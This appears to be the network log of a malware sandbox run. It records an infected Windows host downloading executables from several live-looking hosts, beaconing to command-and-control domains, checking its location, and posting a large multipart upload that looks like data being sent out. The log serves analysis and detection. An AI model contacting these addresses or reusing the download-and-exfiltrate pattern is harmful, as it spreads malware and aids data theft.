                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:20 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xtBWgn7SgYBRU%2FSjYjuFttUJ5A3St6iVXw019vWnd8y7diL4mlV%2B2KFtUbPSj80Jx%2BgRzkyruUlSIwdS3gmnt%2FThndwencG%2FODVgRDYQQoKCrb%2BxGY8z0HqtTxGO36Vv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47e749cd28ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://wxfnbvx.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 239
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:20 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FycbFRbXw7fWRPKYC340K%2BmHJieEPxBDfDnt0tVj6wHXzm%2B8s7aslQSV7A84%2B4DK5zpxoFckuiUqZ0kpBIfJAmwGNSnJ5H8YDQ9G0EbhfPpE2soPTJqT%2FMs%2FRVGumerE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47eace6d28ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://wpaddgmv.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 222
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:21 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oh10uV9HpfpcfOGhuV9nPlQMq75yjsmwmokF1w%2FJ%2FTFGeLCLLG85yAFUWS861bRVkT2dtuuMeCbqAncrdk4j3CE0Sk9CcDsRUcpIsELFHFGPM4U5%2BNkgkjcIobkYILzv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47ed292728ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://fapavk.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 125
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:21 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R7Ue2AuXeLzB%2B3ApPqNEIiTW%2FSH%2BB0rFkdhovO2qrZujEOHzDejHpmrXIvvHa2fWh15qZt4dreJOzlqfTpngkDezxGBpmg2TxRgqnLO0%2FPTrJgSngkzrDfZo%2BPERAI4p"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47f07ce928ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://puosdmiy.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 180
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:22 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o4VZoVwg%2BKzrGuW7Rypz3R9Xs43CeVNkrRlkBG6i9g68SyqaWuWNCxBC4wsSXmH4WmaA0vCBEgYzAChXQCA43%2BOkgRh2wmwLX1jq26sNkglEVTL%2F92kEH1MC2J6U%2BaiN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47f2bf7128ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://elxxyb.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 190
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:44 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=V8AVxPHxW2SvPpR%2BPkee5%2F2ZH71wJ7LNZUq3R0oPURGKf3Zi8z70hJOyW3cX0y28jmkp7yfyvX%2B8oWeuor2X1FIznR25upMY%2FGJGVmqGYfYdMVIHSW1EhQaDVKnQQY8N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d48800f5428ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://194.110.203.101/puta/japanx86.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      194.110.203.101:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /puta/japanx86.exe HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Host: 194.110.203.101
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:17 GMT
                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                      Last-Modified: Mon, 09 Jan 2023 12:30:06 GMT
                                                                                                                                                                      ETag: "6aa00-5f1d3ed5e391b"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Length: 436736
                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      polyzi.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      polyzi.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      polyzi.com
                                                                                                                                                                      IN A
                                                                                                                                                                      95.217.49.230
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://polyzi.com/systems/ChromeSetup.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      95.217.49.230:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /systems/ChromeSetup.exe HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Host: polyzi.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:19 GMT
                                                                                                                                                                      Server: Apache
                                                                                                                                                                      Last-Modified: Mon, 09 Jan 2023 12:00:03 GMT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Length: 335360
                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      api.2ip.ua
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      api.2ip.ua
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      api.2ip.ua
                                                                                                                                                                      IN A
                                                                                                                                                                      162.0.217.254
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://api.2ip.ua/geo.json
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      162.0.217.254:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /geo.json HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 429 Too Many Requests
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:32 GMT
                                                                                                                                                                      Server: Apache
                                                                                                                                                                      Strict-Transport-Security: max-age=63072000; preload
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block; report=...
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                      Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                      Connection: Upgrade
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://api.2ip.ua/geo.json
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      162.0.217.254:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /geo.json HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 429 Too Many Requests
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:42 GMT
                                                                                                                                                                      Server: Apache
                                                                                                                                                                      Strict-Transport-Security: max-age=63072000; preload
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block; report=...
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                      Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                      Connection: Upgrade
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      uaery.top
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      uaery.top
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      uaery.top
                                                                                                                                                                      IN A
                                                                                                                                                                      190.219.54.242
                                                                                                                                                                      uaery.top
                                                                                                                                                                      IN A
                                                                                                                                                                      58.235.189.192
                                                                                                                                                                      uaery.top
                                                                                                                                                                      IN A
                                                                                                                                                                      211.171.233.126
                                                                                                                                                                      uaery.top
                                                                                                                                                                      IN A
                                                                                                                                                                      175.119.10.231
                                                                                                                                                                      uaery.top
                                                                                                                                                                      IN A
                                                                                                                                                                      213.231.134.136
                                                                                                                                                                      uaery.top
                                                                                                                                                                      IN A
                                                                                                                                                                      210.182.29.70
                                                                                                                                                                      uaery.top
                                                                                                                                                                      IN A
                                                                                                                                                                      185.95.186.58
                                                                                                                                                                      uaery.top
                                                                                                                                                                      IN A
                                                                                                                                                                      187.212.192.17
                                                                                                                                                                      uaery.top
                                                                                                                                                                      IN A
                                                                                                                                                                      187.170.238.164
                                                                                                                                                                      uaery.top
                                                                                                                                                                      IN A
                                                                                                                                                                      187.232.159.164
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      IN A
                                                                                                                                                                      195.158.3.162
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      IN A
                                                                                                                                                                      175.119.10.231
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      IN A
                                                                                                                                                                      211.119.84.111
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      IN A
                                                                                                                                                                      190.147.188.50
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      IN A
                                                                                                                                                                      211.59.14.90
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      IN A
                                                                                                                                                                      95.107.163.44
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      IN A
                                                                                                                                                                      123.140.161.243
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      IN A
                                                                                                                                                                      190.219.54.242
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      IN A
                                                                                                                                                                      58.235.189.192
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      IN A
                                                                                                                                                                      210.182.29.70
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://uaery.top/dl/build2.exe
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.219.54.242:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /dl/build2.exe HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: uaery.top
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:43 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                                                                                      Last-Modified: Tue, 03 Jan 2023 08:55:47 GMT
                                                                                                                                                                      ETag: "6b600-5f1583be2faf8"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Length: 439808
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://spaceris.com/lancer/get.php?pid=A576FD670C4D34DE4BF0FF8DFDF7F163&first=true
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      195.158.3.162:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /lancer/get.php?pid=A576FD670C4D34DE4BF0FF8DFDF7F163&first=true HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: spaceris.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:42 GMT
                                                                                                                                                                      Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 563
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://spaceris.com/files/1/build3.exe
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      195.158.3.162:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /files/1/build3.exe HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: spaceris.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:46 GMT
                                                                                                                                                                      Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                                                      Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
                                                                                                                                                                      ETag: "2600-5c86757379380"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Length: 9728
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      t.me
                                                                                                                                                                      build2.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      t.me
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      t.me
                                                                                                                                                                      IN A
                                                                                                                                                                      149.154.167.99
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://t.me/year2023start
                                                                                                                                                                      build2.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      149.154.167.99:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /year2023start HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
                                                                                                                                                                      Host: t.me
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:04 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Content-Length: 12404
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Set-Cookie: stel_ssid=f2a07c4bbb1bf8f2bd_5880764152399388998; expires=Tue, 10 Jan 2023 12:48:04 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Cache-control: no-store
                                                                                                                                                                      X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                      Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                      Strict-Transport-Security: max-age=35768000
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://49.12.113.110/19
                                                                                                                                                                      build2.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      49.12.113.110:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /19 HTTP/1.1
                                                                                                                                                                      Host: 49.12.113.110
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:05 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://49.12.113.110/samefiles.zip
                                                                                                                                                                      build2.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      49.12.113.110:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /samefiles.zip HTTP/1.1
                                                                                                                                                                      Host: 49.12.113.110
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:05 GMT
                                                                                                                                                                      Content-Type: application/zip
                                                                                                                                                                      Content-Length: 1565849
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Last-Modified: Fri, 01 Jul 2022 07:59:49 GMT
                                                                                                                                                                      ETag: "62bea975-17e499"
                                                                                                                                                                      Expires: Tue, 10 Jan 2023 12:48:05 GMT
                                                                                                                                                                      Cache-Control: max-age=86400
                                                                                                                                                                      X-Cache-Status: HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://49.12.113.110/
                                                                                                                                                                      build2.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      49.12.113.110:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----2612306240682792
                                                                                                                                                                      Host: 49.12.113.110
                                                                                                                                                                      Content-Length: 184864
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:08 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      vatra.at
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      vatra.at
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      vatra.at
                                                                                                                                                                      IN A
                                                                                                                                                                      190.147.188.50
                                                                                                                                                                      vatra.at
                                                                                                                                                                      IN A
                                                                                                                                                                      203.91.116.53
                                                                                                                                                                      vatra.at
                                                                                                                                                                      IN A
                                                                                                                                                                      190.117.75.91
                                                                                                                                                                      vatra.at
                                                                                                                                                                      IN A
                                                                                                                                                                      175.120.254.9
                                                                                                                                                                      vatra.at
                                                                                                                                                                      IN A
                                                                                                                                                                      211.53.230.67
                                                                                                                                                                      vatra.at
                                                                                                                                                                      IN A
                                                                                                                                                                      187.212.192.17
                                                                                                                                                                      vatra.at
                                                                                                                                                                      IN A
                                                                                                                                                                      211.119.84.112
                                                                                                                                                                      vatra.at
                                                                                                                                                                      IN A
                                                                                                                                                                      211.40.39.251
                                                                                                                                                                      vatra.at
                                                                                                                                                                      IN A
                                                                                                                                                                      211.171.233.126
                                                                                                                                                                      vatra.at
                                                                                                                                                                      IN A
                                                                                                                                                                      95.107.163.44
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://lguaw.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 225
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:07 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://bphlkdtcpa.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 296
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:08 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://vluvbaj.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 125
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:09 GMT
